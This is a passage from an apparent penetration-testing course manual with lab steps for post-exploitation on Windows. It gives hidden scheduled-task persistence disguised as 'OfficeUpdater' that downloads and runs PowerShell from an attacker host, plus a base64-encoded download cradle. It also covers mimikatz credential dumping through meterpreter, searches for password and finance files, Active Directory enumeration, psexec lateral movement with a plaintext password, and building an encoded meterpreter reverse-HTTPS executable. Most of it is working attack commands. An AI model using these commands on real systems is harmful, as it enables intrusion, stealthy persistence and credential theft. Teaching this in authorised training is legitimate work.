net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onlogon /ru System

#(X86) - On System Start

schtasks /create /tn OfficeUpdaterB /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object

net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onstart /ru System

(124)

#(X86) - On User Idle (30mins)

schtasks /create /tn OfficeUpdaterC /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object

net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onidle /i 30

#(X64) - On User Login

schtasks /create /tn OfficeUpdaterA /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object

net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onlogon /ru System

(125)

Strategic Security, Inc. © http://strategicsec.com/ schtasks /create /tn OfficeUpdaterB /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object

net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onstart /ru System

#(X64) - On User Idle (30mins)

schtasks /create /tn OfficeUpdaterC /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object

(126)

Use exploit/windows/misc/psh_web_delivery (fill required information)

open second console cd /var/www

sudo wget http://10.10.5.235:8080/strategicsec32 sudo cp strategicsec32 strategicsec64

(127)

net.webclient).downloadstring('http://<ip>/payload1'))" use base64 and Encode it to avoid IEX evaluating inline

%WINDIR%\syswow64\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://<ip>/payload2'))"

(example)

Place if statement in payload1 (strategicsec32) Set-StrictMode -Version 2 if ($env:Processor_Architecture -ne "x86") { cmd /c ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(("JVdJTkRJUiVcc3lzd29 3NjRcV2luZG93c1Bvd2VyU2hlbGxcdjEuMFxwb3dlcnNoZWxsLmV4ZSAtdyBoaWRkZW4gLW5vcCAtZXA gYnlwYXNzIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdod HRwOi8vMTAuMTAuNS4yMzUvc3RyYXRlZ2ljc2VjNjQnKSki")))) exit }

(128)

(129)

Lab 15: Host Enumeration

(130)

gpresult /z

List OS Version: ver

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductName

(131)

(132)

View the list of started processes and their respective owner: tasklist /v

Kill a process by name: taskkill /F /IM "cmd.exe"

List the software installed on the system: reg query HKLM\Software

(133)

(134)

List Mounted Devices: fsutil fsinfo drives

(135)

List Most Recently Run Commands:

c:\reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" Check for Autorun:

(136)

reg.exe query HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall /S

reg.exe query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ /S

reg.exe query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ /S

(137)

At

(138)

(139)

Lab 16: Credential Harvesting & Data-Mining

meterpreter > getsystem meterpreter > load mimikatz meterpreter > kerberos

(140)

meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"

meterpreter > msv <-- Your AD password

(141)

(142)

meterpreter > tspkg <-- Your AD password

meterpreter > wdigest <-- Your AD password

meterpreter > mimikatz_command -f crypto::listStores meterpreter > mimikatz_command -f crypto::listCertificates meterpreter > mimikatz_command -f crypto::exportCertificates meterpreter > mimikatz_command -f crypto::patchcapi

(143)

meterpreter> search -d <directory> -f <file-pattern>

Data Mining The Host

meterpreter> execute -c -H -f cmd -a "/k" -i <--- Switch to command shell

Search the drive and sort the files by time accessed c:\dir C:\ /S /OD /TA

(144)

Search the drive and sort the files by time created c:\dir C:\ /S /OD /TC

(145)

c:\dir C:\ /S /OD /TW

Search the drive for files with business critical names or important file types c:\dir c:\*bank* /s

(146)

c:\dir c:\*password* /s

(147)

c:\dir c:\*competitor* /s

(148)

Strategic Security, Inc. © http://strategicsec.com/ c:\dir c:\*finance* /s c:\dir c:\*invoice* /s c:\dir c:\*risk* /s c:\dir c:\*assessment* /s c:\dir c:\*key* /s c:\dir c:\*.vsd /s c:\dir c:\*.pcf /s c:\dir c:\*.ica /s c:\dir c:\*.crt /s c:\dir c:\*.key /s c:\dir c:\*.log /s

Search the drive for files with critical data in them c:\type c:\sysprep.inf c:\type c:\sysprep\sysprep.xml c:\findstr /I /N /S /P /C:password * c:\findstr /I /N /S /P /C:secret * c:\findstr /I /N /S /P /C:confidential * c:\findstr /I /N /S /P /C:account * c:\findstr /I /N /S /P /C:payroll * c:\findstr /I /N /S /P /C:credit *

(149)

c:\findstr /I /N /S /P /C:record * Active Directory Enumeration

meterpreter> execute -c -H -f cmd -a "/k" -i <--- Switch to command shell c:\net view

(150)

c:\net view /domain

c:\net user

(151)

c:\net localgroup

(152)

c:\net localgroup administrators

c:\net localgroup administrators /domain

(153)

(154)

net user "jima" /domain

echo %logonserver:*\\=%

(155)

c:\dsquery user -name * -limit 1000 Increasing dsquery limit

(156)

c:\dsquery group

Listing all of the groups on a machine

c:\dsquery group "<distinguished name>" Listing all of the groups on a machine

Useful Resource Kit Tools ---

(157)

Find out which OU a user account resides

c:\dsquery user -samid user_name

List all domain users

(158)

All info about user "yoy"

c:\dsquery * -filter "(&(objectcategory=person)(objectclass=user)(samaccountname=yoy))" -limit 0 -attr *

Query Groups

c:\dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=*))" -limit 0 -attr Name

(159)

Strategic Security, Inc. © http://strategicsec.com/ c:\dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=Users))" -limit 0 -attr *

(160)

Lab 17: Life without metasploit

echo @echo off > pingsweep.bat

echo for %%a in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254) do ping -n 2 -w 2000 %1.%%a >> pingsweep.bat pingsweep.bat

more

(161)

for /L %i in (1,1,255) do @echo 10.10.30.%i >> ips.txt more ips.txt

(162)

echo jima >> names.txt echo roge >> names.txt echo patr >> names.txt echo jami >> names.txt echo bonn >> names.txt echo rhon >> names.txt echo sall >> names.txt echo joyj >> names.txt echo laur >> names.txt echo sloa >> names.txt

echo Administrator >> names.txt more names.txt

(163)

PSExec to a machine that you want connect to PSExec in Windows

c:\psexec.exe /accepteula \\10.10.30.81 -u administrator -p P@ssw0rd4321! cmd.exe PSExec in Linux

cd ~/toolz

wget https://s3.amazonaws.com/StrategicSec-Files/winexe chmod 777 winexe

(164)

How many users are logged on/connected to a server? NET SESSION | FIND /C "\\"

(165)

net use O: \\10.10.30.89\c$ /u:administrator P@ssw0rd4321! net use /d O:

Which updates were installed on this compter?

Windows 7/8 (note: DISM will return far more details than WMIC.): c:\DISM /Online /Get-Packages

(166)

or:

(167)

Lab 18: Setting up your second entry

sudo add-apt-repository ppa:tobydox/mingw

(168)

(169)

cd /home/strategicsec/toolz/metasploit touch ./met_template.c

(170)

./msfpayload windows/meterpreter/reverse_https LHOST=10.10.5.234 LPORT=443 EXITFUNC=thread R | ./msfencode -c 5 -e x86/shikata_ga_nai > payload

(171)

sed -in-place -e 's/\ +//' ./payload cat payload

(172)

cat /dev/urandom | tr -dc A-Za-z0-9 | head -c512 > random cat random

vi win-met-rev-https.c

/opt/mingw32/bin/i686-w64-mingw32-gcc ./win-met-rev-https.c -o ./win-met-rev-https.exe chmod 777 ./win-met-rev-https.exe

cp /home/strategicsec/toolz/metasploit/win-met-rev-https.exe /var/www/ exit